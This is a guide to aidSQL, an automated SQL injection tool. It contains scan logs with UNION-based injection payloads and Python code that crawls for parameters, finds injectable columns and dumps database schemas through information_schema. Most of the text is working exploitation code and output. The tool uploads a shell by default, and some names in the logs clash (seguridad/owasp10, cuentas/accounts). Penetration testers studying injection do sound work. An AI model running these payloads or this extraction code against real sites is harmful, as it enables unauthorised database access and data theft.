Merges the exploitation and data-mining report into TXT and XML format.
Basic usage:
Perform an automated scan of a web application. The following command starts an automated scan of the target web application:
./aidSQL --url=[URL] --no-shell
Where:
- --url: Web application URL address.
- --no-shell: Disables the option to upload a shell.
Note: By default the tool is configured to perform the data mining and upload a shell as soon as it finds a vulnerable parameter, so it is recommended to disable the shell option to minimize the impact on the web application and/or application server.
The tool begins by crawling the web application to build a site map of the pages and parameters present.
Normalized URL: http://midominio.com.mx/miaplicacion/
Crawling ...
Fetching content from http://midominio.com.mx/miaplicacion/
200 OK
TOTAL URL's found: 55
Add file index.jsp ...
Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html
Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"
Parsing previously crawled URL, looking for new parameters
Adding new parameter "do"
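Added example (Python, not aidSQL's own code): a minimal site-map builder that does what the crawl log above describes. It resolves each link against the page it was found on, keeps only same-host pages whose extension is in the list of types the tool tests, and records every parameter name seen in query strings and GET forms. The pages are constructed inline so it runs offline; the hostnames, links and form fields are assumptions modelled on the log, and a real crawler would fetch each in-scope URL instead of reading the dictionary.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse, urlunparse

# Page types the tool tests (the list printed in the crawl log above).
TESTABLE_EXT = {"php", "asp", "aspx", "cfm", "do", "jsp", "htm", "html"}


class LinkExtractor(HTMLParser):
    """Collect <a href> targets and GET <form> actions with their input names."""

    def __init__(self):
        super().__init__()
        self.links = []      # list of (href, [form parameter names])
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append((a["href"], []))
        elif tag == "form" and a.get("action") and (a.get("method") or "get").lower() == "get":
            self._form = (a["action"], [])
            self.links.append(self._form)
        elif tag in ("input", "select", "textarea") and self._form and a.get("name"):
            self._form[1].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def normalize(base, href):
    """Resolve a link against the page it was found on and drop the fragment."""
    u = urlparse(urljoin(base, href))
    return urlunparse((u.scheme, u.netloc, u.path or "/", "", u.query, ""))


def extension(url):
    """File extension of the URL path, '' when there is none."""
    last = urlparse(url).path.rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[-1].lower() if "." in last else ""


def page_of(url):
    """URL without query or fragment: the key of the site map."""
    u = urlparse(url)
    return urlunparse((u.scheme, u.netloc, u.path, "", "", ""))


def build_sitemap(start, pages):
    """pages maps page URL -> HTML already fetched (constructed below; a real
    crawler GETs each in-scope page). Returns {page URL: set of parameter names}
    for same-host pages of a testable type."""
    host = urlparse(start).netloc
    sitemap, queue, seen = {}, [start], set()
    while queue:
        url = queue.pop(0)
        if url in seen or url not in pages:
            continue
        seen.add(url)
        parser = LinkExtractor()
        parser.feed(pages[url])
        for href, form_params in parser.links:
            full = normalize(url, href)
            if urlparse(full).netloc != host or extension(full) not in TESTABLE_EXT:
                continue                     # off-host, or static content such as .png/.pdf
            page = page_of(full)
            params = sitemap.setdefault(page, set())
            params.update(parse_qs(urlparse(full).query, keep_blank_values=True))
            params.update(form_params)
            if page not in seen:
                queue.append(page)
    return sitemap


# Constructed pages standing in for fetched content (hosts, links and form
# fields are assumptions modelled on the crawl log above).
BASE = "http://midominio.com.mx/miaplicacion/"
PAGES = {
    BASE: '<a href="index.jsp?message=Welcome">Home</a>\n'
          '<a href="http://other.example.org/x.php?q=1">Partner site</a>\n'
          '<img src="logo.png"><a href="docs/manual.pdf">Manual</a>',
    BASE + "index.jsp": '<a href="index.jsp?do=logout">Logout</a><a href="info.jsp#top">Info</a>\n'
          '<form action="index.jsp" method="get"><input type="hidden" name="page" value="user-info.php">\n'
          '<input name="user"><input name="password">\n'
          '<input type="submit" name="user-info-php-submit-button" value="View Account Details"></form>',
    BASE + "info.jsp": '<a href="index.jsp?message=Welcome">Back</a>',
}

if __name__ == "__main__":
    for page, params in build_sitemap(BASE, PAGES).items():
        print(page, sorted(params))
```

Parameters discovered through forms are just as injectable as those in links, which is why the extractor walks GET forms too; POST forms would need the same treatment with a separate request method.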
This information is then used to detect vulnerable parameters by injecting predefined SQL injection payloads (UNION queries) and analysing the web application's responses.
Testing links ...
1. { http://midominio.com.mx/miaplicacion/index.jsp }
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
Set method GET …
Load sqli => mysql5 ... OK
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome
sql injection plugin...
[1][ [message] | METHOD: unionQuery
[QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
[WW] WARNING: GOT 403
[2][ message] | METHOD: unionQuery …
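Added example (Python, not code from the aidSQL project) of the detection logic the log above illustrates. The markers are `<aidsql>` and `</aidsql>`, sent as the MySQL hex literals 0x3c61696473716c3e and 0x3c2f61696473716c3e, so the literal marker text can only show up in a response if the database evaluated the injected SELECT; a page that merely reflects the parameter never matches. The column count is found by sweeping UNION probes, and a 403 (the "[WW] WARNING: GOT 403" case) is treated as a block rather than a clean result. The target page, `fake_app`, is a constructed stand-in with a five-column base query; the URL and parameter names are taken from the log and are assumptions.

```python
import html
import os
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Markers wrapped around the injected column. They travel hex-encoded, so the
# request never contains "<aidsql>" in clear; only the database can produce it.
MARK_OPEN, MARK_CLOSE = "<aidsql>", "</aidsql>"
MARK_RE = re.compile(re.escape(MARK_OPEN) + r"(\d+)" + re.escape(MARK_CLOSE))


def sql_hex(s):
    """Render a string as a MySQL hex literal (0x3c61... decodes back to '<a...')."""
    return "0x" + s.encode().hex()


def union_probe(ncols, marker_col=1, token=None):
    """One probe per column count: a random token that matches no row, a quote
    to close the original literal, UNION ALL SELECT with the marker in one
    column, and a comment to discard the rest of the original query."""
    token = token or os.urandom(16).hex()
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[marker_col - 1] = f"CONCAT({sql_hex(MARK_OPEN)},{marker_col},{sql_hex(MARK_CLOSE)})"
    return f"{token}' UNION ALL SELECT {','.join(cols)}; -- "


def build_url(base, params, target, payload):
    """Put the payload in the tested parameter, keeping the page's other parameters."""
    p = dict(params)
    p[target] = payload
    return base + "?" + urlencode(p)


def classify(status, body):
    """What one response means. html.unescape lets the marker survive a template
    that HTML-encodes its output; a reflected raw payload cannot match because
    it only carries the hex form of the markers."""
    if status == 403:
        return "blocked"          # WAF/IDS; do not count this as "not vulnerable"
    if status >= 500:
        return "error"            # typically a column-count mismatch
    return "vulnerable" if MARK_RE.search(html.unescape(body)) else "clean"


def find_column_count(send, base, params, target, max_cols=20):
    """Sweep column counts until a marker comes back; stop on a block."""
    for n in range(1, max_cols + 1):
        status, body = send(build_url(base, params, target, union_probe(n)))
        verdict = classify(status, body)
        if verdict == "blocked":
            return None
        if verdict == "vulnerable":
            return n
    return None


# --- constructed stand-in for a vulnerable page (hypothetical, not a server) ---
def _top_level_columns(select_list):
    depth, n = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            n += 1
    return n


def fake_app(url, real_cols=5):
    """Mimics index.jsp: the base query has 5 columns, the page reflects the
    parameter (HTML-escaped) and renders any UNION row the database returns."""
    payload = parse_qs(urlparse(url).query).get("message", [""])[0]
    m = re.search(r"UNION ALL SELECT (.*?); --", payload)
    if not m:
        return 200, "<p>Welcome</p>"
    if _top_level_columns(m.group(1)) != real_cols:
        return 500, "The used SELECT statements have a different number of columns"
    row = re.sub(r"CONCAT\(0x([0-9a-f]+),(\d+),0x([0-9a-f]+)\)",
                 lambda mm: bytes.fromhex(mm.group(1)).decode() + mm.group(2)
                 + bytes.fromhex(mm.group(3)).decode(), m.group(1))
    return 200, f"<p>Welcome {html.escape(payload)}</p><tr><td>{row}</td></tr>"


if __name__ == "__main__":
    base = "http://midominio.com.mx/miaplicacion/index.jsp"
    print(find_column_count(fake_app, base, {"page": "user-info.php"}, "message"))
```

The random token matters as much as the markers: it guarantees the original WHERE clause selects nothing, so the only row rendered is the one from the UNION, and it makes each probe unique in the server logs, which is what the hashes at the front of the queries in the log above are.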
During the scan, when a vulnerable parameter is detected, the data-mining module is called to extract information from the database.
Site is vulnerable to sql injection!
Skipping calling plugin's get shell method
Fetching database user ...
[message] | METHOD: unionQuery
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
FOUND DATABASE seguridad
[message] | METHOD: unionQuery
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
Normalized URL:
http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
Fetching table "cuentas" columns ...
[message] | METHOD: unionQuery
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
Normalized URL:
http://midominio.com.mx/miaplicacion
/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
FROM+information_schema.columns+
WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php
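Added example (Python, not the project's own code) of the data-mining step shown above. The information_schema queries are built with hex literals for every string (0x6f776173703130 is owasp10, 0x6163636f756e7473 is accounts, 0x7c is the | field separator and 0x25 the % entry separator), so no extra quote characters are needed, and the GROUP_CONCAT blob returned between the markers is split back into table and column records. One deliberate change from the page's column query: IF(COLUMN_KEY,COLUMN_KEY,0) makes MySQL evaluate the string numerically, so a key of PRI or an extra of auto_increment comes back as 0 (which is what the sample log shows for cid); the example uses IF(LENGTH(COLUMN_KEY),COLUMN_KEY,0) instead. Responses come from `fake_send`, a constructed stand-in, and the second table with its columns is invented sample data. Two caveats for a real target: GROUP_CONCAT is silently cut at group_concat_max_len (1024 bytes by default), so compare the list length against a COUNT(*) on large schemas, and a view has NULL ENGINE and TABLE_COLLATION, which makes its whole entry NULL and drops it from the list unless those fields are wrapped in IFNULL.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

MARK_OPEN, MARK_CLOSE = "<aidsql>", "</aidsql>"
MARK_RE = re.compile(re.escape(MARK_OPEN) + r"(.*?)" + re.escape(MARK_CLOSE), re.S)


def sql_hex(s):
    """String -> MySQL hex literal, so the payload needs no quote characters."""
    return "0x" + s.encode().hex()


def sql_unhex(h):
    """Decode a hex literal (without 0x) back to text, e.g. 6f776173703130 -> owasp10."""
    return bytes.fromhex(h).decode()


def union_query(token, ncols, marker_col, expr, tail=""):
    """UNION ALL SELECT with `expr` wrapped in the markers in column `marker_col`."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[marker_col - 1] = f"CONCAT({sql_hex(MARK_OPEN)},{expr},{sql_hex(MARK_CLOSE)})"
    return f"{token}' UNION ALL SELECT {','.join(cols)}{tail}; -- "


def q_tables(token, ncols, col, schema):
    expr = ("GROUP_CONCAT(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,"
            "TABLE_COLLATION,0x7c,IF(AUTO_INCREMENT,1,0))")
    return union_query(token, ncols, col, expr,
                       f" FROM information_schema.tables WHERE table_schema={sql_hex(schema)}")


def q_columns(token, ncols, col, schema, table):
    # IF(LENGTH(x),x,0) rather than the page's IF(x,x,0): LENGTH gives a real
    # number, so 'PRI' / 'auto_increment' survive instead of collapsing to 0.
    # SEPARATOR 0x25 ('%') because column types such as decimal(10,2) contain commas.
    expr = ("GROUP_CONCAT(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(LENGTH(COLUMN_KEY),COLUMN_KEY,0),"
            "0x7c,IF(LENGTH(EXTRA),EXTRA,0) SEPARATOR 0x25)")
    return union_query(token, ncols, col, expr,
                       f" FROM information_schema.columns WHERE table_schema={sql_hex(schema)}"
                       f" AND table_name={sql_hex(table)}")


def extract(body):
    """Text between the markers, or None when the probe did not render."""
    m = MARK_RE.search(html.unescape(body))
    return m.group(1) if m else None


def parse_tables(blob):
    """Entries use GROUP_CONCAT's default ',' separator; fields are '|'-separated."""
    out = []
    for entry in blob.split(","):
        name, ttype, engine, collation, inc = entry.split("|")
        out.append({"name": name, "type": ttype, "engine": engine,
                    "collation": collation, "increment": int(inc)})
    return out


def parse_columns(blob):
    return [dict(zip(("name", "type", "key", "extra"), e.split("|"))) for e in blob.split("%")]


def mine_schema(send, base, params, target, token, ncols, col, schema):
    """Walk information_schema through the injection point: tables, then columns per table."""
    def run(query):
        p = dict(params)
        p[target] = query
        blob = extract(send(base + "?" + urlencode(p)))
        if blob is None:
            raise RuntimeError("marker missing: response blocked, errored or not rendered")
        return blob
    tables = parse_tables(run(q_tables(token, ncols, col, schema)))
    for t in tables:
        t["columns"] = parse_columns(run(q_columns(token, ncols, col, schema, t["name"])))
    return {"name": schema, "tables": tables}


# --- constructed responses a vulnerable page would render (not a real server;
# pen_test_tools is a table name from the page, its columns are invented) ---
SAMPLE = {
    "tables": "accounts|BASE TABLE|InnoDB|latin1_swedish_ci|1,pen_test_tools|BASE TABLE|InnoDB|latin1_swedish_ci|0",
    "accounts": "cid|int(11)|PRI|auto_increment%username|text|0|0",
    "pen_test_tools": "tool_id|int(11)|PRI|auto_increment%tool_name|text|0|0",
}


def fake_send(url):
    payload = parse_qs(urlparse(url).query)["message"][0]
    key = "tables"
    if "information_schema.columns" in payload:
        key = sql_unhex(re.search(r"table_name=0x([0-9a-f]+)", payload).group(1))
    return f"<html><td>1</td><td>{MARK_OPEN}{SAMPLE[key]}{MARK_CLOSE}</td></html>"


if __name__ == "__main__":
    base = "http://midominio.com.mx/miaplicacion/index.jsp"
    print(mine_schema(fake_send, base, {"page": "user-info.php"}, "message",
                      "51761685aa5034e0731b9c9978073af0", 5, 2, "owasp10"))
```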
When the scan completes, the tool displays a summary of the vulnerabilities detected and the scan duration.
VULNERABLE LINKS FOUND : 1
TOTAL TIME : 53 seconds
The tool automatically saves the results of the exploitation and data mining in its internal folder:
- Folder /logs/[application name]
- Log file - index.php_console.log
- XML file - index.php_db_schemas.xml
index.php_console.log file example:
HOST midominio.com.mx
------------------------------------
PLUGIN NAME : UNION
PLUGIN AUTHOR : Juan Stange
REQUEST VARIABLES : message, do, info, page,…
VULNERABLE LINK : http://midominio.com.mx/miaplicacion
/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
------------------------------------------------
SCHEMA seguridad
------------------------------------------------
VERSION : 5.5.16
DATADIR :
TABLE cuentas
---------------------
type : BASE TABLE
engine : InnoDB
collation : latin1_swedish_ci
increment : 1
COLUMNS
---------------------
NAME : cid
type int(11)
key 0
extra 0
NAME : username
…
index.php_db_schemas.xml file example:
<schemas>
<database name="owasp10" version="5.5.16" datadir="">
<tables>
<table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
<column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
<column name="username"><type>text</type><key>0</key><extra>0</extra></column>
…
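Added example (Python, not the project's code) that writes and reads the index.php_db_schemas.xml layout shown above and emits the SCHEMA block of index.php_console.log. The schema record is constructed from the values on this page. Names and types in these files come straight from the target's information_schema, so they are untrusted text: building the XML with ElementTree instead of string concatenation keeps a table or column name containing <, & or a quote from producing a malformed file, and the same parser is what a report generator consuming the scan output would use.

```python
import xml.etree.ElementTree as ET

# Constructed schema record in the shape the page's XML describes; not real data.
SCHEMA = {
    "name": "owasp10", "version": "5.5.16", "datadir": "",
    "tables": [{
        "name": "accounts", "type": "BASE TABLE", "engine": "InnoDB",
        "collation": "latin1_swedish_ci", "increment": 1,
        "columns": [
            {"name": "cid", "type": "int(11)", "key": "0", "extra": "0"},
            {"name": "username", "type": "text", "key": "0", "extra": "0"},
        ],
    }],
}

TABLE_ATTRS = ("type", "engine", "collation", "increment")   # attributes of <table>
COLUMN_FIELDS = ("type", "key", "extra")                      # child elements of <column>


def schema_to_xml(*schemas):
    """Serialize to the index.php_db_schemas.xml layout. ElementTree escapes
    <, & and quotes in names that came from the target database."""
    root = ET.Element("schemas")
    for s in schemas:
        db = ET.SubElement(root, "database", name=s["name"], version=s["version"], datadir=s["datadir"])
        tables = ET.SubElement(db, "tables")
        for t in s["tables"]:
            te = ET.SubElement(tables, "table", name=t["name"], **{a: str(t[a]) for a in TABLE_ATTRS})
            for c in t["columns"]:
                ce = ET.SubElement(te, "column", name=c["name"])
                for f in COLUMN_FIELDS:
                    ET.SubElement(ce, f).text = str(c[f])
    return ET.tostring(root, encoding="unicode")


def xml_to_schema(text):
    """Parse the file back into the same dict shape, one entry per <database>."""
    out = []
    for db in ET.fromstring(text).findall("database"):
        tables = []
        for t in db.find("tables").findall("table"):
            rec = {"name": t.get("name"), **{a: t.get(a) for a in TABLE_ATTRS}}
            rec["increment"] = int(rec["increment"])
            rec["columns"] = [{"name": c.get("name"), **{f: c.findtext(f) for f in COLUMN_FIELDS}}
                              for c in t.findall("column")]
            tables.append(rec)
        out.append({"name": db.get("name"), "version": db.get("version"),
                    "datadir": db.get("datadir"), "tables": tables})
    return out


def schema_to_console(s):
    """The plain-text SCHEMA block as written to index.php_console.log."""
    lines = ["-" * 48, f"SCHEMA {s['name']}", "-" * 48,
             f"VERSION : {s['version']}", f"DATADIR : {s['datadir']}"]
    for t in s["tables"]:
        lines += [f"TABLE {t['name']}", "-" * 21]
        lines += [f"{a} : {t[a]}" for a in TABLE_ATTRS] + ["COLUMNS", "-" * 21]
        for c in t["columns"]:
            lines += [f"NAME : {c['name']}"] + [f"{f} {c[f]}" for f in COLUMN_FIELDS]
    return "\n".join(lines)


if __name__ == "__main__":
    print(schema_to_xml(SCHEMA))
    print(schema_to_console(SCHEMA))
```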
Resources:
Link: http://code.google.com/p/aidsql/.
Author(s): jpfstange
LynxSec IT consulting and security.
Contact: lynxsec [at] gmail.com
IRC: irc.freenode.net #aidsql
Twitter: http://twitter.com/#!aidsql
License: GNU GPL v2